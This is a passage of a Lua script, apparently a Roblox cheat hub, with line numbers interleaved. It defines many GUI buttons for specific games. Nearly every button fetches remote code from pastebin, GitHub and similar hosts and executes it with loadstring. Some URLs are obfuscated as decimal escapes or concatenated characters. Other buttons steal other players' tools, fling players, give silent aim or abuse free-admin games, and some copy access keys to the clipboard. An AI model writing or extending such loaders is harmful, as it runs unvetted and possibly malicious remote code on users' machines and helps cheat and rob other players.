local GamesSection = Games:NewSection("[T-TITANS BATTLEGROUNDS๐Ÿฆธโ€โ™€๏ธ๐Ÿฆน๐Ÿฟโ€โ™‚๏ธ]")
2596
2597
GamesSection:NewButton("T-TITANS BATTEGROUNDS OP GUI", "no kooldown blah blah", function()pcall(function()
2598
2599
loadstring(game:HttpGet("https://roflux.net/scripts/games/" .. tostring(game.PlaceId) .. ".lua"))()
2600
end)
2601
end)
2602
2603
local GamesSection = Games:NewSection("[๐Ÿ•Pet Empire Tykoon๐Ÿ•]")
2604
2605
GamesSection:NewButton("Auto Kollekt, Auto Press, etx.", "๐Ÿถ๐Ÿฑ๐Ÿ•๐Ÿฐ๐Ÿˆ๐Ÿน๐Ÿ‡", function()-- petempire toraisme
2606
loadstring(game:HttpGet("https://raw.githubusercontent.com/ToraIsMe2/ToraIsMe2/main/0pettycoon", true))()
2607
end)
2608
2609
local GamesSection = Games:NewSection("[Survive & Kill The Killers in AREA 51๐Ÿ‘ฝ๐Ÿ›ธ]")
2610
2611
GamesSection:NewButton("Raygun Tp, 99999 Ammo", "press the gun off and on to get 99999 ammo", function()loadstring(game:HttpGet("https://pastebin.com/raw/tCxvzGXi"))()
2612
end)
2613
2614
local GamesSection = Games:NewSection("[๐ŸงŸโ€โ™‚๏ธZombie Attaxk๐ŸงŸโ€โ™‚๏ธ]")
2615
2616
GamesSection:NewButton("Autofarm, All guns/knives, etx.", "my zombie atk gui", function()loadstring(game:HttpGet("https://pastebin.com/raw/fzxqESwF"))()
2617
end)
2618
2619
local GamesSection = Games:NewSection("[๐ŸŒˆRainbow Friends 2๐ŸŽญ]")
2620
2621
GamesSection:NewButton("OP Rainbow Friends GUI", "best rainbow friends skript", function()loadstring(game:HttpGet('https://raw.githubusercontent.com/ToraIsMe/ToraIsMe/main/0rainbow'))()
2622
end)
2623
2624
local GamesSection = Games:NewSection("[๐Ÿ‡Adopt Me๐Ÿด]")
2625
2626
GamesSection:NewButton("Fly Ride Pets", "fly ability for all pets", function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/rblxscriptsnet/scripts/main/adoptmegui1'),true))()
2627
end)
2628
2629
local GamesSection = Games:NewSection("[๐Ÿ’ช๐ŸฝStrongman Simulator๐Ÿ‹๐Ÿพ]")
2630
GamesSection:NewButton("Strongman Simulator Autofarm GUI", "gui",
2631
function()-- strongman simulator
2632
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectLightningDev/Project-Lightning-Loader/main/Loader.Lua"))()
2633
end)
2634
2635
local GamesSection = Games:NewSection("[YEET A FRIEND]")
2636
2637
GamesSection:NewButton("autofarm,autothrow,autorebirth, etx.", "req by xhelulu",
2638
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/robloxfui/LuxurySoucre/main/Foru",true))()
2639
end)
2640
2641
2642
2643
local GamesSection = Games:NewSection("[โ›“๏ธPrison Life๐Ÿš”]")
2644
2645
GamesSection:NewButton("Tiger Admin", "admin kommands, kmdlist",
2646
function()loadstring(game:HttpGet('https://raw.githubusercontent.com/H17S32/Tiger_Admin/main/Script'))()
2647
end)
2648
2649
GamesSection:NewButton("STEAL ALL TOOLS", "works if player has tools (tools=items)",
2650
function()for i,v in pairs (game.Players:GetChildren()) do
2651
wait()
2652
for i,b in pairs (v.Backpack:GetChildren()) do
2653
b.Parent = game.Players.LocalPlayer.Backpack
2654
end
2655
end
2656
end)
2657
2658
GamesSection:NewButton("Tiger Admin (REVAMPED, fix))", "tiger admin revamp",
2659
function()
2660
loadstring(game:HttpGet("https://pastecode.dev/raw/qb10tlse/tigeradminRevamped_lulaslollipop",true))()
2661
2662
-- loadstring(game:HttpGet("https://rawscripts.net/raw/Prison-Life-TIGER-ADMIN-REVAMPED-7593"))()
2663
--Tiger admin revamped new version
2664
end)
2665
2666
GamesSection:NewButton("Prison life admin hub", "adminHub",
2667
function()
2668
loadstring(game:HttpGet("https://pastebin.com/raw/GzeWWPWN"))()
2669
-- Prison life admin hub
2670
end)
2671
2672
GamesSection:NewButton("Juanko Prison Life Admin Hub", "request by emil", function()
2673
--[[
2674
Juanko prison life admin hub only games prison life
2675
]]
2676
loadstring(game:HttpGet("https://pastebin.com/raw/0Jyaa9aQ"))()
2677
end)
2678
2679
GamesSection:NewButton("Version Life hub", "request by emil", function()
2680
--[[
2681
version life hub for prisonlife
2682
]]
2683
loadstring(game:HttpGet("https://raw.githubusercontent.com/Berliandakhensy/Version/main/version%20life.lua.txt"))()
2684
end)
2685
2686
GamesSection:NewButton("Nexus Hub", "hub",
2687
function()
2688
loadstring(game:HttpGet("https://raw.githubusercontent.com/GwnStefano/NexusHub/main/Main", true))()
2689
--Nexus hub for prison life game
2690
end)
2691
2692
GamesSection:NewButton("Synix Beta Hub", "hub",
2693
function()
2694
loadstring(game:HttpGet("https://raw.githubusercontent.com/GwnStefano/NexusHub/main/Main", true))()
2695
--Nexus hub for prison life game
2696
end)
2697
2698
GamesSection:NewButton("Remove Trees", "self explanatory", function()
2699
--[[
2700
delete trees
2701
]]
2702
game:GetService("Workspace").Trees:Destroy()
2703
end)
2704
2705
GamesSection:NewButton("FE sound for prison life", "fe sound", function()
2706
loadstring(game:HttpGet("https://raw.githubusercontent.com/SmartModBoy/script4/main/prisonsound", true))()
2707
--fe sound for prison life game
2708
end)
2709
2710
GamesSection:NewButton("Mobile Paxks for prison life", "paxks", function()
2711
loadstring(game:HttpGet('https://freenote.biz/raw/ZcYw0XR8lW'))()
2712
--Mobile paxks
2713
end)
2714
2715
GamesSection:NewButton("prison life 1", "skript", function()
2716
loadstring(game:HttpGet("https://rawscripts.net/raw/Prison-Life-Roblox-script-8414"))()
2717
--Prison life 1
2718
end)
2719
2720
GamesSection:NewButton("prison life 2", "skript", function()
2721
loadstring(game:HttpGet('https://paste.website/p/96d68817-3f1e-4fef-a8b8-9aafdc810329.txt'))()
2722
--Prison life 2
2723
end)
2724
2725
GamesSection:NewButton("prison life 3", "skript", function()
2726
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")()
2727
--Prison life 3
2728
end)
2729
2730
GamesSection:NewButton("prison life 4", "skript", function()
2731
loadstring(game:HttpGet("https://pastebin.com/raw/xgJ27vLc"))()
2732
--Prison life 4
2733
end)
2734
2735
GamesSection:NewButton("prison life 5 - SSSWWW222", "skript", function()
2736
loadstring(game:HttpGet(('https://raw.githubusercontent.com/zeuise0002/SSSWWW222/main/README.md'),true))()
2737
--Prison life 5
2738
end)
2739
2740
GamesSection:NewButton("prison life 6 gui", "gui for prisonlife", function()
2741
loadstring(game:HttpGet("https://pastebin.com/3caDghrg"))();
2742
--Prison life 6
2743
end)
2744
2745
GamesSection:NewButton("prison life 7 - PixelLoxkers", "gui for prisonlife", function()
2746
loadstring(game:HttpGet('https://raw.githubusercontent.com/PixelLockers/Roblox-Scripts----/main/Prison%20Life-Script%20(v1)', true))()
2747
--Prison life 7
2748
end)
2749
2750
GamesSection:NewButton("PRISONWARE v1.3", "gui for prisonlife", function()
2751
loadstring(game:HttpGet("https://raw.githubusercontent.com/Denverrz/scripts/master/PRISONWARE_v1.3.txt"))();
2752
--Prison life 8
2753
end)
2754
2755
GamesSection:NewButton("TeddyHub", "gui for prisonlife", function()
2756
loadstring(game:HttpGet("https://rawscripts.net/raw/Prison-Life-(Cars-fixed!)-Prison-life-teddy-hub-2451"))()
2757
--Prison life 9
2758
end)
2759
2760
GamesSection:NewButton("prison life 10 gui", "gui for prisonlife idk", function()
2761
loadstring(game:HttpGet("https://pastebin.com/raw/mHfK0Xk4", true))()
2762
--Prison life 10
2763
end)
2764
2765
2766
local GamesSection = Games:NewSection("[โ˜ฎ๏ธ๐Ÿ•Š๏ธHAZE PIEXE๐Ÿง˜๐Ÿฝโ€โ™‚๏ธ๐Ÿ•Š๏ธ]")
2767
2768
GamesSection:NewButton("ThundarZ hub for haze piexe", "haze piexe", function()
2769
loadstring(game:HttpGet("https://raw.githubusercontent.com/ThundarZ/Welcome/main/Main/Loader/AllGame.lua"))()
2770
end)
2771
2772
--Ftf
2773
local GamesSection = Games:NewSection("[๐Ÿƒ๐Ÿฝโ€โ™‚๏ธ๐Ÿ’จFlee The Faxility๐Ÿ’ป]")
2774
2775
GamesSection:NewButton("AutoHaxk,ESP & more", "ftf gui",
2776
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/LeviTheOtaku/roblox-scripts/main/FTFHAX.lua",true))()
2777
end)
2778
2779
local GamesSection = Games:NewSection("[โ“Murder Mystery 2๐Ÿ”ช]")
2780
2781
GamesSection:NewButton("MM2 - TbaoHub thaibao", "tbaohub", function()-- Mm2 tbaohub
2782
loadstring(game:HttpGet("https://raw.githubusercontent.com/tbao143/thaibao/main/TbaoHubMurderMystery2"))()
2783
end)
2784
2785
GamesSection:NewButton("MM2 GUI (New)", "esp,see murderer&more",
2786
function()loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Drifter0507/GUIS/main/MURDER%20MYSTERY%202", true))();
2787
end)
2788
2789
GamesSection:NewButton("MM2 Admin Panel", "esp blah blah more",
2790
function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/MarsQQ/ScriptHubScripts/master/MM2%20Admin%20Panel'),true))()
2791
end)
2792
2793
GamesSection:NewButton("OP MM2 GUI 2", "best mm2 skript",
2794
function()-- MURDER MYSTERY 2 kavoui
2795
loadstring(game:HttpGet("https://raw.githubusercontent.com/Amenteso/robloxscripts/main/Key.lua",true))()
2796
end)
2797
2798
GamesSection:NewButton("Kopy >OP MM2 GUI 2< ๐Ÿ”‘", "key: mTAgLLFQJazwRWGh",
2799
function()
2800
setclipboard("mTAgLLFQJazwRWGh")
2801
2802
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
2803
Library.DefaultColor = Color3.fromRGB(50,205,50)
2804
2805
Library:Notification({
2806
Text = "kopied 'OP MM2 GUI 2' ๐Ÿ”‘",
2807
Duration = 3.5
2808
})
2809
end)
2810
2811
GamesSection:NewButton("Symphony Hub (OP!)", "op asf",
2812
function()
2813
local a,b,c,d=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,"https://itsjidy.github.io/SymphonyHub/Loader.html"c(a and b, "your exekutor is not supported")a(b({Url=d,Method="GET"}).Body)()
2814
end)
2815
2816
GamesSection:NewButton("TheHanki (may be lag)", "๐Ÿ”‘ = hawkhubneverdies (work fluxus and delta)",
2817
function()
2818
-- mm2
2819
2820
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheHanki/Hawk/main/Loader", true))()
2821
end)
2822
2823
GamesSection:NewButton("Kopy > TheHanki < ๐Ÿ”‘", "key: hawkhubneverdies",
2824
function()
2825
setclipboard("hawkhubneverdies")
2826
2827
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
2828
Library.DefaultColor = Color3.fromRGB(50,205,50)
2829
2830
Library:Notification({
2831
Text = "kopied 'TheHanki' ๐Ÿ”‘",
2832
Duration = 3.5
2833
})
2834
end)
2835
2836
2837
local GamesSection = Games:NewSection("[FREE ADMIN]")
2838
2839
GamesSection:NewButton("Fedatorum Admin Abuser", "only works in freeadmin games",
2840
function()-- fedatorum admin abuser
2841
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/showcases/main/fedoratumadmin",true))()
2842
end)
2843
2844
2845
local GamesSection = Games:NewSection("[Breaking Point]")
2846
2847
GamesSection:NewButton("H4R7NHaxks breakingpoint skript", "bp",
2848
function()--Skript Breaking point
2849
2850
loadstring(game:HttpGet("https://raw.githubusercontent.com/H4R7NHacks/Obfuscated/master/Breaking%20Point%20H4R7N%20Hack%20v1.2.lua"))()
2851
end)
2852
2853
GamesSection:NewButton("Anti Die", "work for fluxus and delta",
2854
function()--anti die
2855
2856
loadstring(game:HttpGet(("https://pastebin.com/raw/mT10xnt7"), true))()
2857
end)
2858
2859
2860
2861
2862
2863
2864
2865
local GamesSection = Games:NewSection("๐Ÿ—ผTower Of Hell๐Ÿ—ผ")
2866
2867
GamesSection:NewButton("ToH Admin", "its only admin kommands", function()
2868
loadstring(game:HttpGet("https://raw.githubusercontent.com/TwomadJR/nto/main/admiin"))()
2869
end)
2870
2871
GamesSection:NewButton("ToH GUI 1", "so Op for TOH", function()
2872
loadstring(game:HttpGet('https://pastebin.com/raw/BbVHjH56'))()
2873
end)
2874
2875
GamesSection:NewButton("ToH Gui 2", "2", function()
2876
loadstring(game:HttpGet("https://raw.githubusercontent.com/2dgeneralspam1/scripts-and-stuff/master/scripts/garfield%20hub", true))()
2877
end)
2878
2879
GamesSection:NewButton("ToH Gui 3", "gui3", function()
2880
loadstring(game:HttpGet("https://raw.githubusercontent.com/03koios/TowerOfHell/main/README.md"))()
2881
end)
2882
2883
GamesSection:NewButton("ToH Gui 4", "toh gui4", function()
2884
loadstring(game:HttpGet("https://raw.githubusercontent.com/iiProductionz/Floater-Scripts/main/WaifuEdition/Tower%20Of%20Hell"))()
2885
end)
2886
2887
GamesSection:NewLabel("๐ŸˆFootball Fusion๐Ÿˆ")
2888
GamesSection:NewButton("Football Fusion GUI 1", "havent tested or tried this skript so idk", function()
2889
--football fusion 1
2890
loadstring(game:HttpGet('https://raw.githubusercontent.com/1x2x3/Kanye/main/loadstring.lua'))();
2891
end)
2892
2893
GamesSection:NewButton("Football Fusion GUI 2", "idk gui", function()
2894
--football fusion 2
2895
loadstring(game:HttpGet("https://wiihub.wiigen.net/loaderfree.lua", true))()
2896
end)
2897
2898
GamesSection:NewButton("Football Fusion GUI 3", "ff gui idk", function()
2899
--football fusion 3
2900
loadstring(game:HttpGet('https://pastebin.com/raw/94bSvnqL'))()
2901
end)
2902
2903
GamesSection:NewLabel("๐Ÿค‘Millionaire Empire Tykoon๐Ÿ’ต")
2904
GamesSection:NewButton("Millionaire empire gui", "skript", function()
2905
-- millionaire empire tykoon
2906
loadstring(game:HttpGet("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/spacvehubloader"))()
2907
end)
2908
2909
GamesSection:NewLabel("๐Ÿซ—Slime Tower Tykoon๐Ÿซ—")
2910
GamesSection:NewButton("slime tower 1", "slimetower skript", function()
2911
-- slime tower tykoon
2912
loadstring(game:HttpGet("https://raw.githubusercontent.com/XRoLLu/Rolly_Hub/main/open-source-trash-loader.exe.yeah"))()
2913
end)
2914
2915
GamesSection:NewLabel("๐Ÿƒ๐Ÿฝโ€โ™‚๏ธSonik Speed Simulator๐Ÿƒ๐Ÿฝโ€โ™‚๏ธ")
2916
GamesSection:NewButton("Sonik Speed Sim gui", "sonikspeedsim gui",
2917
function()
2918
-- sonik speed sim
2919
loadstring(game:HttpGet('https://raw.githubusercontent.com/zReal-King/King-Hub-v2/main/Loader.lua'))()
2920
end)
2921
2922
GamesSection:NewLabel("๐Ÿ›’Kart Ride Into Rdite๐Ÿ›’")
2923
GamesSection:NewButton("kart ride into rdite(fun gui)", "finish blah blah",
2924
function()-- kart ride into rdite
2925
loadstring(game:HttpGet("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/spacvehubloader"))()
2926
end)
2927
2928
GamesSection:NewLabel("๐ŸชฆAll Of Us Are Dead๐Ÿชฆ")
2929
GamesSection:NewButton("All of us are dead 1", "something",
2930
function()-- all of us are dead
2931
loadstring(game:HttpGet(('https://raw.githubusercontent.com/zeuise0002/SSSWWW222/main/README.md'),true))()
2932
end)
2933
2934
GamesSection:NewLabel("Pop It Trading")
2935
GamesSection:NewButton("pop it trading gui", "POP IT TRADING DUM*A$$",
2936
function()-- pop it trading
2937
loadstring(game:HttpGet("https://raw.githubusercontent.com/iShield2005/scripts/master/shieldhubloader2"))()
2938
end)
2939
2940
GamesSection:NewLabel("๐Ÿ‘ป๐ŸšชDOORS๐Ÿšช๐Ÿ‘ป")
2941
GamesSection:NewButton("Doors -Awesome Hub gui", "awesomehubgui",
2942
function()-- doors awesome skript
2943
loadstring(game:HttpGet("https://rawscripts.net/raw/DOORS-awesome-script-11450"))()
2944
end)
2945
2946
GamesSection:NewButton("Doors - Toosiwhip hub V6 ", "toosiwhiphub",
2947
function()-- doors toosiwhip v6
2948
loadstring(game:HttpGet('https://raw.githubusercontent.com/toosiwhip/statue-v6/main/doors.lua'))()
2949
end)
2950
2951
GamesSection:NewButton("Doors - Shadowhub", "shadowskripts",
2952
function()-- doors shadowskript
2953
loadstring(game:HttpGet('https://raw.githubusercontent.com/ShadowScripts4Roblox/PROTECTEDLUA/main/Scripts/DOORS/Loader52.lua'))()
2954
end)
2955
2956
GamesSection:NewLabel("โŒImpossible Glass Bridge Obbyโœ…")
2957
GamesSection:NewButton("Reveal Tiles", "reveal tiles blahbla",
2958
function()-- impossible glass bridge obby
2959
loadstring(game:HttpGet("https://github.com/KhSaeed90/Roblox/raw/workspace/ImpossibleGlassBridge"))()
2960
end)
2961
2962
GamesSection:NewLabel("๐Ÿ˜กStairs Of Rage๐Ÿ˜ก")
2963
GamesSection:NewButton("Stairs of rage 1", "let them stay mad",
2964
function()
2965
-- stairs of rage
2966
loadstring(game:HttpGet("https://raw.githubusercontent.com/WinterDinder/Stairs-Of-Rage/main/Main", true))()
2967
end)
2968
2969
GamesSection:NewLabel("๐Ÿƒ๐Ÿฝโ€โ™‚๏ธ๐Ÿš“Barrys Prison Run๐Ÿ‘ฎ๐Ÿผโ€โ™‚๏ธ๐Ÿš”")
2970
GamesSection:NewButton("Barrys prison run gui", "run b run",
2971
function()-- barrys prison run
2972
loadstring(game:HttpGet("https://github.com/KhSaeed90/Roblox/raw/workspace/Barry'sPrisonRun"))()
2973
end)
2974
2975
GamesSection:NewLabel("๐ŸŽนPiano Player๐ŸŽน")
2976
GamesSection:NewButton("Auto Piano Player", "auto piano",
2977
function()
2978
-- piano player
2979
loadstring(game:HttpGet("https://raw.githubusercontent.com/Madness676/3.2Lol/main/AutoPiano3-2.lua", true))()
2980
end)
2981
2982
GamesSection:NewLabel("๐Ÿ™ˆExtreme Hide N Seek๐Ÿ™ˆ")
2983
GamesSection:NewButton("Extreme Hide n Seek", "idk",
2984
function()-- extreme hide n seek
2985
loadstring(game:HttpGet('https://pastebin.com/raw/HAgidzUN'))()
2986
end)
2987
2988
GamesSection:NewLabel("๐Ÿ‘ง๐ŸฝRate My Avatar๐Ÿ‘ฆ๐Ÿฝ")
2989
GamesSection:NewButton("Rate My Avatar 1", "idk",
2990
function()
2991
-- rate my avatar
2992
loadstring(game:HttpGet('https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub'))()
2993
end)
2994
2995
local GamesSection = Games:NewSection("๐ŸฆธAnime Dimensions")
2996
2997
GamesSection:NewButton("Anime Dimensions 1", "Different anime lol", function()
2998
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheWitch-BirdHub/BirdHubv0.1/main/load"))()
2999
end)
3000
3001
GamesSection:NewButton("Anime Dimension 2", "Anime wow im a fan lol", function()
3002
loadstring(game:HttpGet('https://raw.githubusercontent.com/ghost-home/public/main/AnimeGhost.lua', true))()
3003
end)
3004
3005
local GamesSection = Games:NewSection("No Skope Sniper")
3006
3007
GamesSection:NewButton("Op Silent Aim", "Well its not silent lol", function()
3008
getgenv().Settings = {
3009
3010
Fov = 150,
3011
3012
Hitbox = "Head",
3013
3014
FovCircle = true,
3015
3016
}
3017
3018
3019
3020
loadstring(game:HttpGet("https://raw.githubusercontent.com/WetCheezit/Releases/main/No-Scope-Arcade/Silent%20aim.lua"))()
3021
end)
3022
3023
local GamesSection = Games:NewSection("๐ŸšขBuild A Boat๐Ÿšข")
3024
3025
GamesSection:NewButton("Build a Boat 1", "havent played", function()
3026
loadstring(game:HttpGet("https://raw.githubusercontent.com/ThunderZ-HUB/HUB/main/Script"))()
3027
end)
3028
3029
GamesSection:NewButton("Build a Boat 2", "havent play", function()
3030
loadstring(game:HttpGet("https://raw.githubusercontent.com/StenDirt/Trash-Game/main/Script.lua"))()
3031
end)
3032
3033
GamesSection:NewButton("Build a Boat 3", "Dino-Hub", function()
3034
loadstring(game:HttpGet("https://raw.githubusercontent.com/SandaFrosty/Dino-Script/main/Build-Boat-For-Treasure"))()
3035
end)
3036
3037
GamesSection:NewButton("Build a Boat 4", "i dont play it so idk", function()
3038
_G.autofarm = true loadstring(game:HttpGet('https://gist.githubusercontent.com/cod2rx/d2a7e436d3af135d787529141e6485cc/raw/5bb4df0a94b0a3cf06f0c87a25cb6859e56d23e3/BABFT%2520Autofarm.lua'))()
3039
end)
3040
3041
GamesSection:NewButton("Build a Boat 5", "BAB5 gui", function()
3042
_G.Color = Color3.fromRGB(255, 255, 255)
3043
loadstring(game:HttpGet"https://rawscripts.net/raw/SAZA-HUB_496")()
3044
end)
3045
3046
local GamesSection = Games:NewSection("๐Ÿ’ช๐Ÿฝ๐Ÿ’ฅMusxle Legend๐Ÿ’ฅ๐Ÿ’ช๐Ÿฝ")
3047
3048
GamesSection:NewButton("Musxle Lengend GUI 1", "op", function()
3049
loadstring(game:HttpGet('https://raw.githubusercontent.com/jynzl/main/main/Musclas%20Legenos.lua'))()
3050
end)
3051
3052
GamesSection:NewButton("Musxle legend Gui 2", "yea", function()
3053
loadstring(game:HttpGet("https://raw.githubusercontent.com/harisiskandar178/Roblox-Script/main/Muscle%20Legend"))()
3054
end)
3055
3056
local GamesSection = Games:NewSection("๐ŸฅทNinja Legend๐Ÿฅท")
3057
3058
GamesSection:NewButton("Ninja Legend GUI 1", "its old af", function()
3059
loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/1"))()
3060
end)
3061
3062
GamesSection:NewButton("Ninja Legend GUI 2", "its OP but its old", function()
3063
loadstring(game:HttpGet("https://raw.githubusercontent.com/StormSKz12/StirkeHub1/main/Gameincluded"))()
3064
end)
3065
3066
local GamesSection = Games:NewSection("[๐Ÿฅบ๐Ÿ’ฐPls Donate๐Ÿ’ฐ๐Ÿฅบ]")
3067
3068
GamesSection:NewButton("Pls Donate Gui 1", "pls", function()
3069
loadstring(game:HttpGet("https://raw.githubusercontent.com/NocturneMoDz/PLEASE-DONATE-NEW-GUI-/main/METAB"))();
3070
end)
3071
3072
GamesSection:NewButton("Pls Donate Gui 2", " Poor", function()
3073
loadstring(game:HttpGet("https://raw.githubusercontent.com/NocturneMoDz/PLEASE-DONATE-BOOTH-/main/METAB"))()
3074
end)
3075
3076
local GamesSection = Games:NewSection("[One Piexe]")
3077
3078
GamesSection:NewButton("One piexe 1", "Luffy,Zoro,Sanji,Usopp", function()
3079
loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/32"))()
3080
end)
3081
3082
GamesSection:NewButton("One Piexe 2", "Pirate king", function()
3083
loadstring(game:HttpGet(('https://raw.githubusercontent.com/Urbanstorms/Cool-things/main/A%200ne%20Piece%20Game.lua'),true))()
3084
end)
3085
3086
local GamesSection = Games:NewSection("[Raise A Floppa]")
3087
3088
GamesSection:NewButton("Raise a Floppa Gui 1", "Feed kat", function()
3089
loadstring(game:HttpGet('https://raw.githubusercontent.com/SunkenMuch/Soggyware/main/Main',true))()
3090
end)
3091
3092
local GamesSection = Games:NewSection("[Shrek in Baxkroom]")
3093
3094
GamesSection:NewButton("Shrek in Baxkroom Gui 1", "Shrekkkk", function()
3095
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\110\106\120\66\100\102\67\76\10"))()
3096
end)
3097
3098
local GamesSection = Games:NewSection("[๐Ÿง‘๐Ÿฝโ€๐ŸŽจStarving Artist๐Ÿ–Œ๏ธ]")
3099
3100
GamesSection:NewButton("steal art", "wow u bad at art lol", function()
3101
Settings = {
3102
Timer = false -- false if You Dont Wanna Timer --
3103
}
3104
3105
loadstring(game:HttpGet(('https://raw.githubusercontent.com/anisnouacer1/My-Roblox-Scripts/main/Starving%20Artists.lua')))()
3106
end)
3107
3108
3109
local GamesSection = Games:NewSection("[๐ŸฅทBe A parkour Ninja๐Ÿ›]")
3110
3111
GamesSection:NewButton("Be a Parkour Gui 1", "op", function()
3112
loadstring(game:HttpGet("https://raw.githubusercontent.com/Min1273/n-to/main/README.md"))()
3113
end)
3114
3115
3116
local GamesSection = Games:NewSection("[Roblox is Unbreakable]")
3117
3118
GamesSection:NewButton("roblox is unbreakable", "skript", function()
3119
loadstring(game:HttpGet("https://raw.githubusercontent.com/MorikTV/Roblox-is-Unbreakable/main/Unbreakable.lua", true))()
3120
end)
3121
3122
3123
local GamesSection = Games:NewSection("[๐ŸšฝToilet Tower Defense๐Ÿงป]")
3124
3125
GamesSection:NewButton("laziumHub", "lazium", function()
3126
-- Toilet Tower defenxe
3127
3128
loadstring(game:HttpGet("https://raw.githubusercontent.com/NUTellaVING/LaziumHub/main/ToiletTowerDefense.lua"))()
3129
end)
3130
3131
3132
local GamesSection = Games:NewSection("[Sakura Stand]")
3133
--Sakura Stand
3134
3135
GamesSection:NewButton("sakura Stand", "direkt exekute", function()
3136
loadstring(game:HttpGet("https://pastecode.dev/raw/I0KOXXRe/sakuraStand.direktExekute",true))()
3137
end)
3138
3139
3140
local GamesSection = Games:NewSection("[๐Ÿ‘นDemon Fall๐Ÿ‘น]")
3141
3142
GamesSection:NewButton("sakura Stand", "direkt exekute", function()
3143
--Demon Fall
3144
loadstring(game:HttpGet("https://raw.githubusercontent.com/KeoneGithub/KeoneGithub/main/DemonCockCandy",true))()
3145
end)
3146
3147
3148
local GamesSection = Games:NewSection("[๐ŸBee Swarm Simulator๐Ÿ")
3149
3150
GamesSection:NewButton("item name,item kount", "bee swarm", function()
3151
--Bee Swarm Simulator
3152
game:GetService("ReplicatedStorage").Remotes.ModifyItemData:FireServer("Item Name", ItemCount)
3153
end)
3154
GamesSection:NewButton("Bee swarm sim skript", "bee swarm", function()
3155
loadstring(game:HttpGet(('https://raw.githubusercontent.com/AltsegoD/script/master/BeeSwarmSimulator.lua')))()
3156
end)
3157
3158
3159
local GamesSection = Games:NewSection("[๐Ÿš—Kar Dealership๐Ÿ’ต]")
3160
3161
GamesSection:NewButton("kar dealership", "skript for kar dealership", function()
3162
--Kar dealership
3163
loadstring(game:HttpGet("https://raw.githubusercontent.com/03koios/Loader/main/Loader.lua"))()
3164
end)
3165
3166
3167
3168
3169
--// FE SKRIPTS \\--
3170
3171
local Fe = Window:NewTab("FE")
3172
local FeSection = Fe:NewSection("FE Skripts")
3173
3174
FeSection:NewButton("FE server browser ui", "list of servers ui", function()
3175
loadstring(game:HttpGet("https://pastecode.dev/raw/l83qm3as/FEserver-browser90_lulaslollipop",true))()
3176
end)
3177
3178
FeSection:NewButton("FE Stop Time", "freeze in mid air or whatever", function()
3179
loadstring(game:HttpGet('https://raw.githubusercontent.com/creepstu/fuzzy-octo-giggle/main/Source'))()
3180
end)
3181
3182
FeSection:NewButton("FE Fish", "(need hat) Parrot Fishfaxe", function()
3183
-- fe fish
3184
loadstring(game:HttpGet(('https://pastefy.app/yrp6En96/raw'),true))()
3185
end)
3186
3187
FeSection:NewButton("FE Ragdoll Yourself", "reset or die to disable", function()loadstring(game:HttpGet("https://pastebin.com/raw/VY5d58xz"))()
3188
end)
3189
3190
FeSection:NewButton("FE Korblox", "need korblox rekolor for 65 robux, R15", function()
3191
loadstring(game:HttpGet("https://pastebin.com/raw/0NzfiZJn"))()
3192
end)
3193
3194
FeSection:NewButton("FE Vehikle Fly", "flying kar gui", function()
3195
loadstring(game:HttpGet("https://pastebin.com/raw/MHE1cbWF"))()
3196
end)
3197
3198
FeSection:NewButton("FE Baxkflip/Frontflip", "baxk and frontflip", function()
3199
-- fe bk & front
3200
loadstring(game:HttpGet(('https://pastefy.app/yrp6En96/raw'),true))()
3201
end)
3202
3203
FeSection:NewButton("FE Time Reverse", "reverses what u do", function()
3204
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
3205
Library.DefaultColor = Color3.fromRGB(0,255,0)
3206
3207
Library:Notification({
3208
Text = "provided by lulaslollipop",
3209
Duration = 4
3210
})
3211
3212
wait (2)
3213
3214
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
3215
Library.DefaultColor = Color3.fromRGB(0,255,0)
3216
3217
Library:Notification({
3218
Text = "SKRIPT EXEKUTED ๐Ÿญ๐Ÿญ๐Ÿญ๐Ÿญ",
3219
Duration = 4
3220
})
3221
3222
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/L"))()
3223
end)
3224
3225
FeSection:NewButton("FE Deathnote (fling)", "fling a player by walking into them", function()
3226
--feDeathnote
3227
loadstring(game:HttpGet(('h'..'t'..'t'..'p'..'s'..':'..'/'..'/'..'p'..'a'..'s'..'t'..'e'..'f'..'y'..'.'..'a'..'pp'..'/'..'G'..'o'..'K'..'x'..'Y'..'B'..'k'..'U'..'/'..'r'..'a'..'w'), true))()
3228
end)
3229
3230
FeSection:NewButton("FE Ghost", "fling a player by walking into them", function()
3231
--FE GHOST SKRIPT
3232
--WORKS ON R6
3233
--KREDITS TO THE OWNER
3234
3235
loadstring(game:HttpGet("https://pastebin.com/raw/uUtRsAX5"))()
3236
end)
3237
3238
FeSection:NewButton("FE Deathnote (fling)", "fling a player by walking into them", function()
3239
--feDeathnote
3240
